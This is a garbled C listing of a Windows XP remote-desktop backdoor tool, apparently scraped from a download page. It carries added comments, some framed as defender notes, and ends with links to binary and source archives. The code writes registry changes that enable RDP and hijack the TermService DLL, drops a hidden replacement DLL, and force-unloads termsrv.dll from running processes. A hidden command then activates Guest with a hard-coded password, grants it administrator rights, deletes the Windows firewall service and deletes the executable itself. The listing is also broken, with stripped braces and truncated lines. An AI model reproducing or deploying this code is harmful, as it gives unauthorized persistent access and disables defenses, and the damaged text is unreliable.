xp下双开3389源码Word文件下载.docx
pe);
dwRet
dwRet=Process32Next(hSP,&
pe))
if(lstrcmpi(szProcName,pe.szExeFile)==0)
dwPid=pe.th32ProcessID;
bFound=TRUE;
break;
}
CloseHandle(hSP);
if(bFound==TRUE)
returndwPid;
returnNULL;
// EnumWindows callback: sends WM_CLOSE to every visible top-level window owned
// by the process whose id was passed as lParam (HijackService uses it to dismiss
// the error / shutdown dialogs raised while termsrv.dll is force-unloaded).
// Always returns true so the enumeration continues over all windows.
// NOTE: the hosting site stripped whitespace, braces and some line fragments
// from this listing; comments describe the visible intent only.
boolCALLBACKEnumWindowsProc(HWNDhwnd,LPARAMlParam)
if(!
IsWindowVisible(hwnd))returntrue;
DWORDdwWindowThreadId=NULL;
// dwLsassId is assigned but never read in this function.
DWORDdwLsassId=(DWORD)lParam;
// The second argument of GetWindowThreadProcessId receives the owning
// *process* id, which is what is compared against lParam below.
GetWindowThreadProcessId(hwnd,&
dwWindowThreadId);
if(dwWindowThreadId==(DWORD)lParam)
// Close the window belonging to the specified process
SendMessage(hwnd,WM_CLOSE,0,0);
returntrue;
// Writes or deletes registry data under MainKey\SubKey (credited to NameLess114).
// Mode: 0 - create the key (RegCreateKeyEx) and set value Vname; 1 - open the
// existing key and set Vname; 2 - delete the sub-key named Vname; 3 - delete the
// value named Vname. For modes 0/1, Type selects the source: REG_SZ/REG_EXPAND_SZ
// write strlen(szData)+1 bytes of szData, REG_DWORD writes dwData; REG_BINARY has
// no handler in this listing. Returns 1 on success, 0 otherwise.
// NOTE: the hosting site stripped whitespace, braces and some line fragments
// (e.g. the error check after RegOpenKeyEx in case 1); comments describe the
// visible intent only. Every call site in this file targets HKEY_LOCAL_MACHINE.
intWriteRegEx(HKEYMainKey,LPCTSTRSubKey,LPCTSTRVname,DWORDType,char*szData,DWORDdwData,intMode)
HKEYhKey;
DWORDdwDisposition;
intiResult=0;
// MSVC structured exception handling: __leave jumps to the __finally block.
__try
//SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS); (left disabled by the author)
switch(Mode)
case0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&
hKey,&
dwDisposition)!
=ERROR_SUCCESS)
__leave;
case1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&
hKey)!
switch(Type)
caseREG_SZ:
caseREG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1)==ERROR_SUCCESS)
iResult=1;
caseREG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&
dwData,sizeof(DWORD))==ERROR_SUCCESS)
caseREG_BINARY:
case2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&
if(RegDeleteKey(hKey,Vname)==ERROR_SUCCESS)
case3:
if(RegDeleteValue(hKey,Vname)==ERROR_SUCCESS)
// Runs on every exit path, including __leave: closes hKey and also MainKey,
// the caller-supplied root handle.
__finally
RegCloseKey(MainKey);
RegCloseKey(hKey);
returniResult;
// Enables (bEnable=TRUE) or disables the named privilege (e.g. SE_DEBUG_NAME,
// SE_SHUTDOWN_NAME) on the current process token. Returns FALSE when the token
// cannot be opened; otherwise the result depends on GetLastError() after
// AdjustTokenPrivileges (that check is truncated in this listing).
// Defender note: a process enabling SeDebugPrivilege and then opening other
// processes (see UnloadRemoteModule) is the observable pattern here.
boolDebugPrivilege(constchar*PName,BOOLbEnable)
BOOLbResult=TRUE;
HANDLEhToken;
TOKEN_PRIVILEGESTokenPrivileges;
// The leading "if(!" of this call is missing from the listing.
OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES,&
hToken))
bResult=FALSE;
returnbResult;
TokenPrivileges.PrivilegeCount=1;
// SE_PRIVILEGE_ENABLED sets the privilege; 0 clears it.
TokenPrivileges.Privileges[0].Attributes=bEnable?
SE_PRIVILEGE_ENABLED:
0;
LookupPrivilegeValue(NULL,PName,&
TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&
TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError()!
CloseHandle(hToken);
// Forces module hModuleHandle out of process dwProcessID: creates a remote thread
// whose start routine is kernel32!FreeLibrary with the module handle as its
// argument, then waits for it to finish. Returns false when the handle is NULL,
// the process cannot be opened, or the remote thread cannot be created (the
// final return is cut off in this listing).
// Defender note: CreateRemoteThread into another process with a kernel32 export
// as the start address is the behaviour to look for.
boolUnloadRemoteModule(DWORDdwProcessID,HANDLEhModuleHandle)
HANDLEhRemoteThread;
HANDLEhProcess;
if(hModuleHandle==NULL)returnfalse;
// Only the rights needed for CreateRemoteThread are requested.
hProcess=:
:
OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION,FALSE,dwProcessID);
if(hProcess==NULL)returnfalse;
HMODULEhModule=:
GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINEpfnStartRoutine=(LPTHREAD_START_ROUTINE):
GetProcAddress(hModule,“FreeLibrary”);
hRemoteThread=:
CreateRemoteThread(hProcess,NULL,0,pfnStartRoutine,hModuleHandle,0,NULL);
if(hRemoteThread==NULL)
CloseHandle(hProcess);
returnfalse;
WaitForSingleObject(hRemoteThread,INFINITE);
CloseHandle(hRemoteThread);
// Walks the module list of process dwProcessID via a Toolhelp32 snapshot and
// returns the HMODULE whose full path compares case-insensitively equal to
// lpModulePath, or NULL when none matches. The "if(!" in front of lstrcmpi is
// presumably what the listing lost; as written the loop keeps the last match.
HANDLEFindModule(DWORDdwProcessID,LPCTSTRlpModulePath)
HANDLEhModuleHandle=NULL;
MODULEENTRY32me32={0};
HANDLEhModuleSnap=:
CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwProcessID);
// dwSize must be set before Module32First.
me32.dwSize=sizeof(MODULEENTRY32);
if(:
Module32First(hModuleSnap,&
me32))
do
lstrcmpi(me32.szExePath,lpModulePath))
hModuleHandle=me32.hModule;
}while(:
Module32Next(hModuleSnap,&
me32));
CloseHandle(hModuleSnap);
returnhModuleHandle;
// For every running process, looks up lpModulePath with FindModule and, when it
// is loaded, evicts it with UnloadRemoteModule. bRet carries the result of the
// last unload attempted. The "if(" / "do {" wrapper around Process32First is
// missing from this listing. HijackService calls this with <system32>\termsrv.dll.
boolUnloadModule(LPCTSTRlpModulePath)
BOOLbRet=false;
PROCESSENTRY32pe32;
pe32.dwSize=sizeof(pe32);
HANDLEhProcessSnap=:
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
// Look for the processes concerned
Process32First(hProcessSnap,&
pe32))
HANDLEhModuleHandle=FindModule(pe32.th32ProcessID,lpModulePath);
if(hModuleHandle!
=NULL)
bRet=UnloadRemoteModule(pe32.th32ProcessID,hModuleHandle);
}while(Process32Next(hProcessSnap,&
pe32));
CloseHandle(hProcessSnap);
returnbRet;
// Opens the SCM and starts the named service (WinMain calls it with
// "TermService"). The service is opened with DELETE|SERVICE_START although
// only StartService is used; the "if(NULL!" before "=hService)" is cut off in
// this listing. Shares its name with the Win32 API it calls.
voidStartService(LPCTSTRlpService)
SC_HANDLEhSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(NULL!
=hSCManager)
SC_HANDLEhService=OpenService(hSCManager,lpService,DELETE|SERVICE_START);
=hService)
StartService(hService,0,NULL);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
// Writes embedded resource wResourceID of type lpType to disk at lpFileName
// (CREATE_ALWAYS overwrites an existing file). Returns FALSE when the resource
// cannot be found or loaded, or when the file handle test fails; TRUE otherwise
// (WriteFile's result is not checked). ReleaseDll uses it to drop the resource
// tagged IDR_DLL / "BIN" as termsrvhack.dll.
BOOLReleaseResource(WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName)
HGLOBALhRes;
HRSRChResInfo;
HANDLEhFile;
DWORDdwBytes;
hResInfo=FindResource(NULL,MAKEINTRESOURCE(wResourceID),lpType);
if(hResInfo==NULL)returnFALSE;
hRes=LoadResource(NULL,hResInfo);
if(hRes==NULL)returnFALSE;
hFile=CreateFile(lpFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==NULL)returnFALSE;
// hRes is used directly as the byte buffer (no LockResource call).
WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&
dwBytes,NULL);
CloseHandle(hFile);
returnTRUE;
// Registry changes applied at startup, all under HKEY_LOCAL_MACHINE (the site
// rendered backslashes as "//" and dropped spaces, e.g. "Terminal Server"):
//  - Services\TermService : Start = 2 (automatic start)
//  - ...\CurrentVersion\Winlogon : KeepRASConnections = "1"
//  - Control\Terminal Server : fDenyTSConnections = 0 (allow RDP connections)
//  - Control\Terminal Server\Licensing Core : EnableConcurrentSessions = 1
//  - Services\TermService\Parameters : ServiceDll = %SystemRoot%\system32\termsrvhack.dll
// Defender note: these values, above all the ServiceDll redirect, are the
// persistent artifacts of this tool and are worth baselining and alerting on.
voidSetReg()
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SOFTWARE//Microsoft//WindowsNT//CurrentVersion//Winlogon”,“KeepRASConnections”,REG_SZ,“1″,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer”,“fDenyTSConnections”,REG_DWORD,NULL,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer//LicensingCore”,“EnableConcurrentSessions”,REG_DWORD,NULL,1,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService//Parameters”,“ServiceDll”,REG_EXPAND_SZ,“%SystemRoot%//system32//termsrvhack.dll”,0,0);
// Drops the embedded termsrvhack.dll into the system directory and into its
// dllcache sub-directory (presumably so Windows File Protection does not put
// the original back), then marks both copies hidden, read-only and system.
// Backslashes appear as "//" in this listing.
// Defender note: <system32>\termsrvhack.dll and <system32>\dllcache\termsrvhack.dll
// are the file artifacts to look for.
voidReleaseDll()
charstrSystemPath[MAX_PATH];
charstrDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath,sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath,sizeof(strDllcachePath));
lstrcat(strSystemPath,“//termsrvhack.dll”);
lstrcat(strDllcachePath,“//dllcache//termsrvhack.dll”);
ReleaseResource(IDR_DLL,“BIN”,strSystemPath);
ReleaseResource(IDR_DLL,“BIN”,strDllcachePath);
// Hidden + read-only + system to keep the dropped files out of casual view.
SetFileAttributes(strSystemPath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
// Returns true when GetVersionEx reports major.minor == 5.1 (Windows XP).
boolIsOSXP()
OSVERSIONINFOEXOsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO*)&
OsVerInfoEx);
// Note the cast: the EX structure is passed as a plain OSVERSIONINFO pointer
returnOsVerInfoEx.dwMajorVersion==5&
&
OsVerInfoEx.dwMinorVersion==1;
// Replaces the terminal service DLL on XP: drops termsrvhack.dll (ReleaseDll),
// enables SeDebugPrivilege and force-unloads the real <system32>\termsrv.dll
// from every process that has it loaded (UnloadModule; the early return's
// "if(!" is cut off in this listing), then, holding SeShutdownPrivilege, loops
// cancelling the pending system shutdown that the forced unload triggers while
// closing the error windows of drwtsn32.exe and csrss.exe. The variable named
// dwLsassId actually holds the csrss.exe process id.
voidHijackService()
charstrDll[MAX_PATH];
GetSystemDirectory(strDll,sizeof(strDll));
lstrcat(strDll,“//termsrv.dll”);
// Drop termsrvhack.dll
ReleaseDll();
// Walk the processes and unload the currently loaded DLL
DebugPrivilege(SE_DEBUG_NAME,TRUE);
UnloadModule(strDll))return;
DebugPrivilege(SE_DEBUG_NAME,FALSE);
// Close the error dialogs that pop up, and the automatic-shutdown dialog shown
// because the forced DLL unload makes some services terminate abnormally
// Grant the process the shutdown privilege
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORDdwLsassId=GetProcessId(”csrss.exe”);
// Keep cancelling until AbortSystemShutdown succeeds.
while(!
AbortSystemShutdown(NULL))
// Some systems pop up drwtsn32.exe
DWORDdwDrwtsn32Id=GetProcessId(”drwtsn32.exe”);
if(dwDrwtsn32Id!
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwDrwtsn32Id);
// Forcing the module out raises errors; close the error window shown by csrss.exe
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwLsassId);
Sleep(10);
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
// Entry point. Applies the registry changes (SetReg), on XP replaces termsrv.dll
// (HijackService), starts TermService, then runs a hidden cmd.exe command line
// that enables the built-in Guest account with a hard-coded password, adds it
// to the local Administrators group, stops and deletes the SharedAccess
// (Windows Firewall / ICS) service and deletes this executable.
// Defender note: the "net user" / "net localgroup" / "sc delete SharedAccess"
// command line launched through WinExec is the easiest event to alert on,
// together with the registry and file artifacts written by SetReg and ReleaseDll.
// ("previousinstance" on the signature line is a stray comment fragment.)
intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,previousinstance
LPSTRlpCmdLine,intnCmdShow)
// Some registry operations
SetReg();
if(IsOSXP())
// Replace the DLL
HijackService();
// Start the terminal service
StartService(”TermService”);
// Activate guest, add it to the administrators group, self-delete, stop XP's
// built-in firewall and delete it
charstrCommand[1024];
charstrSelf[MAX_PATH];
// strSelf = path of this executable, used by the "del" step below.
GetModuleFileName(NULL,strSelf,sizeof(strSelf));
wsprintf(strCommand,“cmd.exe/cnetuserguest/active:
yes&
netuserguestcooldiyer&
netlocalgroupadministratorsguest/add&
netstopSharedAccess/y&
del/”%s/”&
scdeleteSharedAccess”,strSelf);
// SW_HIDE keeps the console window invisible.
WinExec(strCommand,SW_HIDE);
return0;
}
//http:
//201314.free.fr/attachments/200805/xp3389_bin.rar//http:
//201314.free.fr/attachments/200805/xp3389_src.rar